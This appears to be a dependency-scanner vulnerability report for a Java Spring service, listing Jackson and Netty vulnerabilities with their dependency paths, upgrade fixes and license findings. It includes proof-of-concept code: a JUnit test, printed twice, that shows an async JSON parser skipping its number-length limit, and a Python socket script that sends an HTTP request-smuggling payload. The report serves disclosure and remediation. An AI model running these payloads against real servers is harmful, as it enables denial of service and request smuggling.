Vulnerabilities

7 via 23 paths

Dependencies

181

Source

GitHub

Commit

4f1c61e1

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 7
  • 3
Severity
  • 7
  • 3
Status
  • 10
  • 0
  • 0

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.18.2, com.fasterxml.jackson.core:jackson-databind@2.18.2 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 com.fasterxml.jackson.core:jackson-core@2.18.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.18.6.
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 com.fasterxml.jackson.core:jackson-databind@2.18.2 com.fasterxml.jackson.core:jackson-core@2.18.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.18.6.
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.15 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.15 org.springdoc:springdoc-openapi-starter-common@2.8.15 io.swagger.core.v3:swagger-core-jakarta@2.2.41 com.fasterxml.jackson.core:jackson-databind@2.18.2 com.fasterxml.jackson.core:jackson-core@2.18.2
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.15 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.15 org.springdoc:springdoc-openapi-starter-common@2.8.15 io.swagger.core.v3:swagger-core-jakarta@2.2.41 com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.19.2 com.fasterxml.jackson.core:jackson-databind@2.18.2 com.fasterxml.jackson.core:jackson-core@2.18.2

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.

References

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.18.2, com.fasterxml.jackson.core:jackson-databind@2.18.2 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 com.fasterxml.jackson.core:jackson-core@2.18.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.2.
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 com.fasterxml.jackson.core:jackson-databind@2.18.2 com.fasterxml.jackson.core:jackson-core@2.18.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.2.
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.15 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.15 org.springdoc:springdoc-openapi-starter-common@2.8.15 io.swagger.core.v3:swagger-core-jakarta@2.2.41 com.fasterxml.jackson.core:jackson-databind@2.18.2 com.fasterxml.jackson.core:jackson-core@2.18.2
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.15 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.15 org.springdoc:springdoc-openapi-starter-common@2.8.15 io.swagger.core.v3:swagger-core-jakarta@2.2.41 com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.19.2 com.fasterxml.jackson.core:jackson-databind@2.18.2 com.fasterxml.jackson.core:jackson-core@2.18.2

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.21.2 or higher.

References

high severity
new

HTTP Request Smuggling

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.google.firebase:firebase-admin@9.7.1 and org.springframework.boot:spring-boot-starter-webflux@4.0.5

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 com.google.firebase:firebase-admin@9.7.1 io.netty:netty-codec-http@4.2.9.Final
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-reactor-netty@4.0.5 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http@4.2.9.Final
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-reactor-netty@4.0.5 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http2@4.2.9.Final io.netty:netty-codec-http@4.2.9.Final
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-reactor-netty@4.0.5 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http3@4.2.10.Final io.netty:netty-codec-http@4.2.9.Final
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-reactor-netty@4.0.5 io.projectreactor.netty:reactor-netty-http@1.3.4 io.projectreactor.netty:reactor-netty-core@1.3.4 io.netty:netty-handler-proxy@4.2.9.Final io.netty:netty-codec-http@4.2.9.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling in the parsing of quoted strings within chunked transfer encoding extension values. An attacker can inject arbitrary HTTP requests into a connection by crafting chunk extensions containing carriage return or line feed bytes, leading to parsing discrepancies between the server and RFC-compliant intermediaries.

PoC

#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break

sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.132.Final, 4.2.12.Final or higher.

References

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: org.springframework.boot:spring-boot-starter-webflux@4.0.5

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-reactor-netty@4.0.5 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http2@4.2.9.Final
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-webflux@4.0.5.

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the verifyContinuationFrame function. An attacker can cause excessive CPU consumption and render the server unresponsive by sending a large number of zero-byte CONTINUATION frames, bypassing existing size-based mitigations.

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.132.Final, 4.2.10.Final or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: net.logstash.logback:logstash-logback-encoder@9.0, org.springframework.boot:spring-boot-starter-web@4.0.5 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 net.logstash.logback:logstash-logback-encoder@9.0 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-jackson@4.0.5 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@4.0.5.
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-jackson@4.0.5 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-webflux@4.0.5.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.0 or higher.

References

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: net.logstash.logback:logstash-logback-encoder@9.0, org.springframework.boot:spring-boot-starter-web@4.0.5 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 net.logstash.logback:logstash-logback-encoder@9.0 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-jackson@4.0.5 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-jackson@4.0.5 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.1 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: net.logstash.logback:logstash-logback-encoder@9.0, org.springframework.boot:spring-boot-starter-web@4.0.5 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 net.logstash.logback:logstash-logback-encoder@9.0 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-jackson@4.0.5 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@4.0.5.
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-jackson@4.0.5 tools.jackson.core:jackson-databind@3.0.1 tools.jackson.core:jackson-core@3.0.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-webflux@4.0.5.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in ReaderBasedJsonParser.java and UTF8DataInputJsonParser.java, when processing deeply nested data. A regression in 3.0 versions caused the StreamReadConstraints.maxNestingDepth setting for DataInput to not be checked, allowing resources to be overwhelmed by malicious inputs.

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.0 or higher.

References

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-validation@4.0.5, org.springframework.boot:spring-boot-starter-actuator@4.0.5 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-validation@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-actuator@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-security@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-actuator@4.0.5 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.15 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.15 org.springdoc:springdoc-openapi-starter-common@2.8.15 org.springframework.boot:spring-boot-starter-validation@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32

Dual license: EPL-1.0, LGPL-2.1

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-validation@4.0.5, org.springframework.boot:spring-boot-starter-actuator@4.0.5 and others

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-validation@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-actuator@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-security@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-actuator@4.0.5 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
